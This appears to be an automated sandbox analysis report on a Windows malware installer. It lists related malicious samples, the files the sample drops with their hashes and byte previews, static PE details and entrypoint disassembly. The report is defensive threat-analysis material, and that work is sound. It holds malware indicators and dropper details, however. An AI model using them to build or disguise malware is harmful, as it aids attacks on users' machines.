                                                PO64747835 PDF.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtfGet hashmaliciousBrowse
                                                    SecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                                        ALuh1ODGq3.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                              C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dllSecuriteInfo.com.W32.AIDetect.malware2.5627.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtfGet hashmaliciousBrowse
                                                                  pago.exeGet hashmaliciousBrowse
                                                                    pago.exeGet hashmaliciousBrowse
                                                                      pago.exeGet hashmaliciousBrowse
                                                                        pago.exeGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\CELSIAN.Gra

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):402254
                                                                          Entropy (8bit):7.791539989948347
                                                                          Encrypted:false
                                                                          SSDEEP:12288:TmJZJW5QhS/VQ40QP6BE4xUARC9LsfQu2aNFtcb:ThQSVQ4SxUARC9LsfQu2aNFtw
                                                                          MD5:F042FA6C1A5A11E1E94F4C7D55F4696F
                                                                          SHA1:3A9C3519A67FD03DC3C97EEA6B04CFFD1AA38715
                                                                          SHA-256:B30D6EBFBD48675A3899E47EA4FEFD63A784CF4D291CE1CE7E805B70BB71D67D
                                                                          SHA-512:775821F4D105DED3FD6294F16640745180A40D2327EA965B325D528E31C3F8C3A1DF7CB8A28AFDA43D383264220E89EF5FAE1CD447FA44478F2C90D8DD37A983
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.>,...BgMkU..).B...H#....Y...M.6..p..6.$.4...X.*......".3..!Q...S..wE[.(P.DhK_.....i......[.wp>.t....U.P.Ns.Sz{2:.O.b.c.oxK=M].../P.Eqm.z....j\%.z..9.'6;?....`:HB.Od...?.l.Y.8.....n8..0...S.....#.....T.B$....._..@N.0.g.:k:...J%R.3'...Lpg..o..:f.....,.x...s.8.*....q..U..)8.v.......,.en..F:....e...[.......: ]./|:..K}y...1..}..j....)W..]...!..._?d......L.i>..i......gk...Y....A,.......".p.m|..#Ap..y.n.%.r.z..-|..Vh$...T.4Z..o...M.|gH@Jt!.M......'.J.0.....iL..]Og......&H../S......".!{.x...".v8.4.5.|.../.!....._;9.1.gp.i3..l.....Z..>'..7.5R.._.VH=C.:-...]..y.+.:Rb;.._{C.>...4M.DT..../.Yx.!.u.#Y"..-..h..._..8...8..a.s....*l.Y..|..8.55.M..p.M..B...D.3f.!.. ...n.A...B...N.2..H.......mKn_.a.u.9....qD...Z...+....^..[..a...L....(."..S{F\....q.l..R.*.m..@RvP.w.....lHR...z.:.w...........)..S..@..;.C.f...I..=.........R7..D....?k..AF3.1s..n..h..../,8}...^...>..4H.-o..8..Q7...B.*.@M7.<q....<...'.h.B?... .)... .P.....%>B....D#.S,....o..:.).:kN0...^A

                                                                          C:\Users\user\AppData\Local\Temp\Exolve.ini

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):32
                                                                          Entropy (8bit):4.663909765557392
                                                                          Encrypted:false
                                                                          SSDEEP:3:Ve4KXOHXRWLkmt:LKesLkQ
                                                                          MD5:272BC34712948F6A7132DD80E17DE84E
                                                                          SHA1:461967EA55D874C28BF0999FB66CACE785D9BCA9
                                                                          SHA-256:019D3E92BF00DC7409E188A19F11AB33C31BFBAFE5B2E036632CC69B71207FE9
                                                                          SHA-512:56BE026C1DCA3326CFC165244E9F0AA6278E779D003BBD9405E4A18408B00B3AB3CBC5B779D4A315EEA43278C306AC307121BB007112A70BEC2B6CDFEE06C958
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:[GORKUN]..Workbags141=REFRACTS..

                                                                          C:\Users\user\AppData\Local\Temp\Green_Leaves_21.bmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                          Category:dropped
                                                                          Size (bytes):10115
                                                                          Entropy (8bit):7.896422756961018
                                                                          Encrypted:false
                                                                          SSDEEP:192:oXRIG87sv/m1vnKaVSuKRXL55hOuf4dXL9J0LEvJyVVcuJ6Sj7YvKvtOJ:KRIjsW1vKPXBgdiWMEMj7YyvG
                                                                          MD5:2F12A714A50993C090C94EC2672490E1
                                                                          SHA1:4F9A319C412F1B1B251C027B1C2448BBDBB9CA6F
                                                                          SHA-256:E759639DCCA8E96864BC82EDBACFD5BB14FE37412A6F3FCE7C82BF1BB944B6E4
                                                                          SHA-512:2B349EAB24DCCE0DBD36433DE13E0B2A551E88A626D5C9A3F68B79E21ACDE4FC238DD4E280E30ACBB76B0EB0E08CE1ACC233AB1C9E2147E2DD01E0917B3A376B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(..0..?l...9.l...7.......S.h..5.....!9...[..$M...E'..y.l@Xxg.i...........?..7..3M.........E...L..Z.$....B.b.@...y.y'..}._.|c......5....G..5-{l.-....+._Q....7......D.|....M.Hb..x....._P./o...RJ0{Zr..q+.....1.......X......G.....|1}...}.a.}/J..Gk.[...j.......+.. .n"..X.Q..9..$....o.....8...o.|K....}

                                                                          C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19056
                                                                          Entropy (8bit):6.442411564417779
                                                                          Encrypted:false
                                                                          SSDEEP:384:8WhLWql40uIrRDTveaVEc2gK/uPHRN7xpJ/AlGseCvy:rfl40uqDTveaVCMxv/xj4y
                                                                          MD5:E3F74999CDB00FCAAA6A40A97B8F199B
                                                                          SHA1:F3A2C8DF8E98F7DCB49CBE5C4A717A6087A656D2
                                                                          SHA-256:6929BC473DF404FCED714F345479216B66B72ACF116061DF1CDD8ACAEE961333
                                                                          SHA-512:3BE3EEAB3304EFEB9594FA516B61528587CFA8453AB7B4AF991137E3A1D7E23270DA600FC341EEF703932CCFF53571ACF3CD00AEEAE47347CC36EE69B71DB37C
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtf, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(_+..........." ..... ...................................................P............`...@......@............... ...............................................&..p$...@..........T...............................................................H............text...X........ .................. ..`.data...D....0......."..............@....reloc.......@.......$..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...C.o.m.p.i.l.e.r.S.e.r.v.i.c.e.s...V.i.s.u.a.l.C...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                          C:\Users\user\AppData\Local\Temp\drive-harddisk-system-symbolic.symbolic.png

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):264
                                                                          Entropy (8bit):6.7753015109610715
                                                                          Encrypted:false
                                                                          SSDEEP:6:6v/lhPysLQNJ4BgpBly/Gj6e3ba4Dzz8fKtVp:6v/7rQb4BAlyU6mDzzoK9
                                                                          MD5:39182B562FCB2BAD93D58516462708A8
                                                                          SHA1:F9A88E1F1313BD05CDB1E962DE8170CCCFDA9151
                                                                          SHA-256:DEF4215BBA93FAED6FCF7E4687EF89AB828DB10E69171A5E14908F091302C59F
                                                                          SHA-512:ECEC5D0E389293DB2977C7A7DCE8E4FAC10A3ADA7466DBA9CE4FE9712F5725D84E67A5E0ED9BE5091D68BD817186D6CFC89CA650CC5323FB8C038A14BAD3896D
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1n.1...(.. l...h.1B.E...#\.$h....l.v...F...7.;\.b...B..w"aWq..?.@...L?qr#.F.,p...'.w.....CxV.X.....b.j...S....8v...e...I..|.\4X..f.G....+.-6....3.....{..".D...rz..-.6...nW.:o1._YVz]."N.....IEND.B`.

                                                                          C:\Users\user\AppData\Local\Temp\mail-unread-symbolic.symbolic.png

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):243
                                                                          Entropy (8bit):6.6375398452197
                                                                          Encrypted:false
                                                                          SSDEEP:6:6v/lhPysEFaTw0eY/5b5sap5kGC125kiUP2afunr2W7Vtljp:6v/7kgoY/7shGC1DHP24u6KtlN
                                                                          MD5:433D25AD6818DB00083CD062A16D3479
                                                                          SHA1:D4210D893E965912EA7BD45C80D359FECAB54A98
                                                                          SHA-256:3D06E8FA89BA4FA9D9BCC260F38C72D1A104FE3E6F8923A3EE553563832027CB
                                                                          SHA-512:E5095FE100F811D73196F01C732AA09E2359E5796DF38A0B3E25599F3F99CCD2ED181070463285655521199B7B084A7848E6629CB5CE0AE07FCBC17D5953FA4C
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..M..0...vQ...BP.vZ./ .+..SD."..c.F.....f^^`....;....9...l..17...0..ML..1.M2....X..90.v......... ....Q...@.m...G.K.-`..\%D.`..B..j\........\.....\.{....g......7..i....\....IEND.B`.

                                                                          C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):5.814115788739565
                                                                          Encrypted:false
                                                                          SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                          MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                          SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                          SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                          SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious, Browse
                                                                          • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                          • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                          • Filename: PO64747835 PDF.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtf, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                                          • Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\scanner.png

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):633
                                                                          Entropy (8bit):7.5766983812463735
                                                                          Encrypted:false
                                                                          SSDEEP:12:6v/7x8QVQCJI+uIidxp+pY5f5Cqxnnu13gYdndacj/Ya+SvGpaNusvrdVJ:PxOI5I0P+2Zu13gIdR/Yla8svrfJ
                                                                          MD5:0CBA7EB7455B0DB79456C5911F12B75E
                                                                          SHA1:DAACA4FE36E4F61016D473A0A1CD4C980906872B
                                                                          SHA-256:50F4DB972320FF30D4FD98B61F58D956678F38FD1D11CA5109E5559D02A986BE
                                                                          SHA-512:D6976DC90DD3B01A7AAFDF67C5360CC75020971473F8689CA73A9931FB36FF4CC6994034664E11B4FF31146767F5B9DB898104BE814A1611C8A02260C66E11D8
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR................a...@IDATx.....&K..kfz..g..g...;_..'..l.....^{..6._...._/g9.B...r...$..._~..4.7@.4h..UU!.2.$A.E...Q.",2..q.[.nc.........-......4:..C..B .c$.N....s........0.l#..UkP IRO.e...g.D...&<jnQ..k......k..T*.....LS,,D..Q.8.0..<...?(//...A.CCm]....e|..<...#.w..:.\{{....PP__.. .i....?..i..L...8t.(.?.......>..G.W..-.~.A9\m..z.E....L....:.l.... .4....;a...^.P.>......s.86.Hq..c!.e...e..7CA).c....w.%..iZ...|.j3(..$.2.?..w..........O?.M..E..!....=\.a..o....m.+V,.Q...pA..I(.s..S.,..!.R.`t....r(.7..H......".......+.}...A..xM....L..L..cG....L$`.;K.m...h..O.r..3.cb#....IEND.B`.

                                                                          C:\Users\user\AppData\Local\Temp\uninstalla.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):265238
                                                                          Entropy (8bit):6.697651009316531
                                                                          Encrypted:false
                                                                          SSDEEP:6144:FR+xXYSIvF68OZGbpYByPT7lyvIco9KX25G5PGDu6WL1g:DMIvk8OvByPHly5425GDum
                                                                          MD5:1DCEAF980C4D83AE2A13BD0F047E1BD7
                                                                          SHA1:7D97E79EFB047361A8C2A8AC0A26B37127C3C7AC
                                                                          SHA-256:0C340FB13ACAAAE759215AF9C970DC6C167418534C421EB626643E20FD0AC832
                                                                          SHA-512:8FDBBBCAAC2B3188819E7F8E3ADE82E01723F27C151EDD50F4AE090339C680CE685540BCA76018BC5494CEBF5001A5FCF97C07D7FC47479BF11CEB38A3CE9FE4
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.......4............@...................................?...@..........................................P...a..........@.>..............................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...X............~..............@....ndata...................................rsrc....a...P...b..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\vm3dc003.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):190624
                                                                          Entropy (8bit):6.481480370859183
                                                                          Encrypted:false
                                                                          SSDEEP:3072:o/qsfTS04VccXuMeXEVmd/AuRV9DKRSeilOA1Fafxc7Kwhbzi+iOh:oysrSDcHbNd7+xmVbP
                                                                          MD5:059BE7432DFAD92F4EA0A2E5941C52A7
                                                                          SHA1:1C1B989D6B9D0FA0808FCA8893ADDC8CD76602D9
                                                                          SHA-256:8E184A514D8716B59B24892CB425752E6D7837735C1E9F1996D66E70BFEC033B
                                                                          SHA-512:EA79397D73840AEA9E9C3AC55F2E4FFA9A10828C2BFD993AB116CC08412E690C3DE10617AC516B944DEA48D7BFCEC201404C9CF0E54A5594A247F5F202F59F57
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........Qvw.Qvw.Qvw.Qvw.Pvw.E.s.Zvw.E.t.Tvw.E.r..vw.=.t.Xvw.=.s.^vw.=.r.Lvw..-r.Pvw...r.Rvw...t.Pvw.4.v.\vw.Qvv..vw...s.Vvw...w.Pvw.....Pvw...u.Pvw.RichQvw.........PE..d......`.........." .....~...........1..............................................].....`A.........................................G..p....G..x...............x....z...n......|....-..8............................,..8....................F..@....................text....}.......~.................. ..`.rdata..............................@..@.data........`.......F..............@....pdata..x............R..............@..@.didat..H............h..............@....gehcont.............j..............@..@_RDATA...............l..............@..@.rsrc................n..............@..@.reloc..|............r..............@..B........................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\vtshim.c

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:C source, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):15782
                                                                          Entropy (8bit):5.207431068394915
                                                                          Encrypted:false
                                                                          SSDEEP:192:zu0gnPI2Z1Fylkd3cd/e5QJvWUnumPw2QJt+UnumPwhJhbjSjSHXMXzhFwqOzj5w:zYIOyaKl+uybeiHtHai
                                                                          MD5:1B00C31FF20D27F07B299063908311E0
                                                                          SHA1:1976E6DD68DD0D64508C91A6DFAB8E75F8AAF6CD
                                                                          SHA-256:EC872BB1DDC330D3F19F68D033B0706E1B78D4A91A58998674B67EAD58BEA729
                                                                          SHA-512:38B29DB2CDA85380F63C86EAAA5D7DE6657EA4C6A0B074D184F6F3218467C865B3D0B56C2844547897139F5C324792C0D3CB5AE1FB4B593AB6F8889A7C88BB30
                                                                          Malicious:false
                                                                          Preview:/*.** 2013-06-12.**.** The author disclaims copyright to this source code. In place of.** a legal notice, here is a blessing:.**.** May you do good and not evil..** May you find forgiveness for yourself and forgive others..** May you share freely, never taking more than you give..**.*************************************************************************.**.** A shim that sits between the SQLite virtual table interface and.** runtimes with garbage collector based memory management..*/.#include "sqlite3ext.h".SQLITE_EXTENSION_INIT1.#include <assert.h>.#include <string.h>..#ifndef SQLITE_OMIT_VIRTUALTABLE../* Forward references */.typedef struct vtshim_aux vtshim_aux;.typedef struct vtshim_vtab vtshim_vtab;.typedef struct vtshim_cursor vtshim_cursor;.../* The vtshim_aux argument is the auxiliary parameter that is passed.** into sqlite3_create_module_v2()..*/.struct vtshim_aux {. void *pChildAux; /* pAux for child virtual tables */. void (*xChildDestroy)(void*);

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.518620994648534
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File size:929272
                                                                          MD5:7f369d460c84146944c3c12bf83901af
                                                                          SHA1:29ea3441429d555ddfd0fd8d5973aab0f9ea2663
                                                                          SHA256:a5e095edbdf743431c5e866c01c3a592fc5a7ddf6bfb617d72f81181743adf3a
                                                                          SHA512:5183cb1c7173fcf8f5d30c9a5842a2e895d50d8a742e7097b7d8862d7e0e6be4a94e166bc4b7175717a18e93c194d1259cb30ed7b649b518f0d9736f66e9f3fc
                                                                          SSDEEP:12288:YbKP7r9r/+ppppppppppppppppppppppppppppp0Y/e4hZJgtQ9STVQ40QPKBut6:YbK1M/e1Q4VQ4muENar+Wav5BK3c
                                                                          TLSH:7C15E0C0E94495A1ED1DAB716A36CD3546237DBDA874A81D25DE3E2B3FFB2D31026023
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                          File Icon

                                                                          Icon Hash:c4c4c4c8ccd4d0c4

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40352d
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          sub esp, 000003F4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [ebp-14h], ebx
                                                                          mov dword ptr [ebp-04h], 0040A2E0h
                                                                          mov dword ptr [ebp-10h], ebx
                                                                          call dword ptr [004080CCh]
                                                                          mov esi, dword ptr [004080D0h]
                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                          push eax
                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                          mov dword ptr [ebp-28h], ebx
                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007FB89C8884BAh
                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [ebp-2Ch], ax
                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                          jnc 00007FB89C88848Ah
                                                                          and word ptr [ebp-00000132h], 0000h
                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                          mov dword ptr [00434FB8h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x354c8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .ndata0x360000x220000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x580000x354c80x35600False0.212867754684data4.44760586334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x585380x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                          RT_ICON0x68d600x94a8dataEnglishUnited States
                                                                          RT_ICON0x722080x67e8dataEnglishUnited States
                                                                          RT_ICON0x789f00x5488dataEnglishUnited States
